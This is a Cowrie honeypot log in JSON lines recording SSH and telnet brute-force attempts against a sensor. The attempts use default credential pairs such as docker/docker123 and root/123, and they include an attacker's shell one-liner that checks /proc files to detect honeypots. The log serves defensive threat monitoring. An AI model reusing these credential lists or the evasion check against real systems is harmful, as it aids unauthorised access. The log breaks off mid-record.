{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:28:55.121849Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.122542Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.123083Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.124571Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.125259Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.126446Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.127457Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.128185Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.129069Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.129941Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.131143Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.222059Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.222930Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:28:55.223821Z","src_ip":"212.227.235.229","session":"4f1e8df1dec5"}
{"eventid":"cowrie.session.connect","src_ip":"1.222.50.93","src_port":53806,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a7943080e6d","protocol":"telnet","message":"New connection: 1.222.50.93:53806 (1.2.3.4:23) [session: 2a7943080e6d]","sensor":"my-vps","timestamp":"2025-08-28T02:29:01.532378Z"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.240.46","src_port":41604,"dst_ip":"1.2.3.4","dst_port":22,"session":"c41a61f022a5","protocol":"ssh","message":"New connection: 77.83.240.46:41604 (1.2.3.4:22) [session: c41a61f022a5]","sensor":"my-vps","timestamp":"2025-08-28T02:29:11.656416Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:29:11.660357Z","src_ip":"77.83.240.46","session":"c41a61f022a5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T02:29:11.671729Z","src_ip":"77.83.240.46","session":"c41a61f022a5"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-28T02:29:11.784793Z","src_ip":"77.83.240.46","session":"c41a61f022a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52831,"dst_ip":"1.2.3.4","dst_port":23,"session":"de9de4bda96f","protocol":"telnet","message":"New connection: 212.227.125.160:52831 (1.2.3.4:23) [session: de9de4bda96f]","sensor":"my-vps","timestamp":"2025-08-28T02:29:12.025209Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:29:12.800225Z","src_ip":"77.83.240.46","session":"c41a61f022a5"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":36134,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dc6f7bd9ad4","protocol":"ssh","message":"New connection: 194.233.79.134:36134 (1.2.3.4:22) [session: 5dc6f7bd9ad4]","sensor":"my-vps","timestamp":"2025-08-28T02:29:23.093290Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:29:23.107366Z","src_ip":"194.233.79.134","session":"5dc6f7bd9ad4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:29:23.276369Z","src_ip":"194.233.79.134","session":"5dc6f7bd9ad4"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-28T02:29:25.645741Z","src_ip":"194.233.79.134","session":"5dc6f7bd9ad4"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:29:26.912184Z","src_ip":"194.233.79.134","session":"5dc6f7bd9ad4"}
{"eventid":"cowrie.session.closed","duration":30.51586413383484,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:29:32.048170Z","src_ip":"1.222.50.93","session":"2a7943080e6d"}
{"eventid":"cowrie.session.closed","duration":31.60012984275818,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:29:43.625261Z","src_ip":"212.227.125.160","session":"de9de4bda96f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50730,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf3b3d847667","protocol":"ssh","message":"New connection: 212.227.125.160:50730 (1.2.3.4:22) [session: bf3b3d847667]","sensor":"my-vps","timestamp":"2025-08-28T02:30:37.283348Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T02:30:37.284834Z","src_ip":"212.227.125.160","session":"bf3b3d847667"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:30:37.285516Z","src_ip":"212.227.125.160","session":"bf3b3d847667"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50738,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c9c07b2f74f","protocol":"ssh","message":"New connection: 212.227.125.160:50738 (1.2.3.4:22) [session: 4c9c07b2f74f]","sensor":"my-vps","timestamp":"2025-08-28T02:30:37.348735Z"}
{"eventid":"cowrie.client.version","version":"GET /favicon.ico HTTP/1.1","message":"Remote SSH version: GET /favicon.ico HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T02:30:37.349461Z","src_ip":"212.227.125.160","session":"4c9c07b2f74f"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:30:37.350268Z","src_ip":"212.227.125.160","session":"4c9c07b2f74f"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":56938,"dst_ip":"1.2.3.4","dst_port":22,"session":"6493dfe84edc","protocol":"ssh","message":"New connection: 194.233.79.134:56938 (1.2.3.4:22) [session: 6493dfe84edc]","sensor":"my-vps","timestamp":"2025-08-28T02:30:37.547846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:30:37.644123Z","src_ip":"194.233.79.134","session":"6493dfe84edc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:30:37.720937Z","src_ip":"194.233.79.134","session":"6493dfe84edc"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch","message":"login attempt [elasticsearch/elasticsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T02:30:39.865008Z","src_ip":"194.233.79.134","session":"6493dfe84edc"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:30:41.487539Z","src_ip":"194.233.79.134","session":"6493dfe84edc"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":58212,"dst_ip":"1.2.3.4","dst_port":22,"session":"33812582989a","protocol":"ssh","message":"New connection: 194.233.79.134:58212 (1.2.3.4:22) [session: 33812582989a]","sensor":"my-vps","timestamp":"2025-08-28T02:32:09.274716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:32:09.416897Z","src_ip":"194.233.79.134","session":"33812582989a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:32:09.557257Z","src_ip":"194.233.79.134","session":"33812582989a"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-28T02:32:11.521753Z","src_ip":"194.233.79.134","session":"33812582989a"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:32:12.800896Z","src_ip":"194.233.79.134","session":"33812582989a"}
{"eventid":"cowrie.session.connect","src_ip":"47.237.132.135","src_port":42640,"dst_ip":"1.2.3.4","dst_port":23,"session":"032fcaa1ebef","protocol":"telnet","message":"New connection: 47.237.132.135:42640 (1.2.3.4:23) [session: 032fcaa1ebef]","sensor":"my-vps","timestamp":"2025-08-28T02:33:05.460257Z"}
{"eventid":"cowrie.session.closed","duration":30.63671112060547,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:33:36.096899Z","src_ip":"47.237.132.135","session":"032fcaa1ebef"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":38742,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e32a55f522c","protocol":"ssh","message":"New connection: 194.233.79.134:38742 (1.2.3.4:22) [session: 2e32a55f522c]","sensor":"my-vps","timestamp":"2025-08-28T02:33:39.163515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:33:39.164463Z","src_ip":"194.233.79.134","session":"2e32a55f522c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:33:39.409881Z","src_ip":"194.233.79.134","session":"2e32a55f522c"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:33:40.786707Z","src_ip":"194.233.79.134","session":"2e32a55f522c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:33:41.169333Z","src_ip":"194.233.79.134","session":"2e32a55f522c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T02:33:41.169988Z","src_ip":"194.233.79.134","session":"2e32a55f522c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:33:41.821543Z","src_ip":"194.233.79.134","session":"2e32a55f522c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:33:41.822592Z","src_ip":"194.233.79.134","session":"2e32a55f522c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57756,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e3f3f63fd8d","protocol":"ssh","message":"New connection: 217.72.205.35:57756 (1.2.3.4:22) [session: 8e3f3f63fd8d]","sensor":"my-vps","timestamp":"2025-08-28T02:33:54.586062Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:33:54.587159Z","src_ip":"217.72.205.35","session":"8e3f3f63fd8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42530,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6135511fb50","protocol":"ssh","message":"New connection: 212.227.235.229:42530 (1.2.3.4:22) [session: d6135511fb50]","sensor":"my-vps","timestamp":"2025-08-28T02:34:07.204345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:34:07.205338Z","src_ip":"212.227.235.229","session":"d6135511fb50"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T02:34:07.312080Z","src_ip":"212.227.235.229","session":"d6135511fb50"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-28T02:34:07.635166Z","src_ip":"212.227.235.229","session":"d6135511fb50"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:34:08.744781Z","src_ip":"212.227.235.229","session":"d6135511fb50"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24052,"dst_ip":"1.2.3.4","dst_port":22,"session":"73a5d80f6530","protocol":"ssh","message":"New connection: 212.227.235.229:24052 (1.2.3.4:22) [session: 73a5d80f6530]","sensor":"my-vps","timestamp":"2025-08-28T02:34:12.234679Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:34:12.236293Z","src_ip":"212.227.235.229","session":"73a5d80f6530"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24450,"dst_ip":"1.2.3.4","dst_port":22,"session":"bccab9ed76bf","protocol":"ssh","message":"New connection: 212.227.235.229:24450 (1.2.3.4:22) [session: bccab9ed76bf]","sensor":"my-vps","timestamp":"2025-08-28T02:34:12.346009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:34:12.346974Z","src_ip":"212.227.235.229","session":"bccab9ed76bf"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 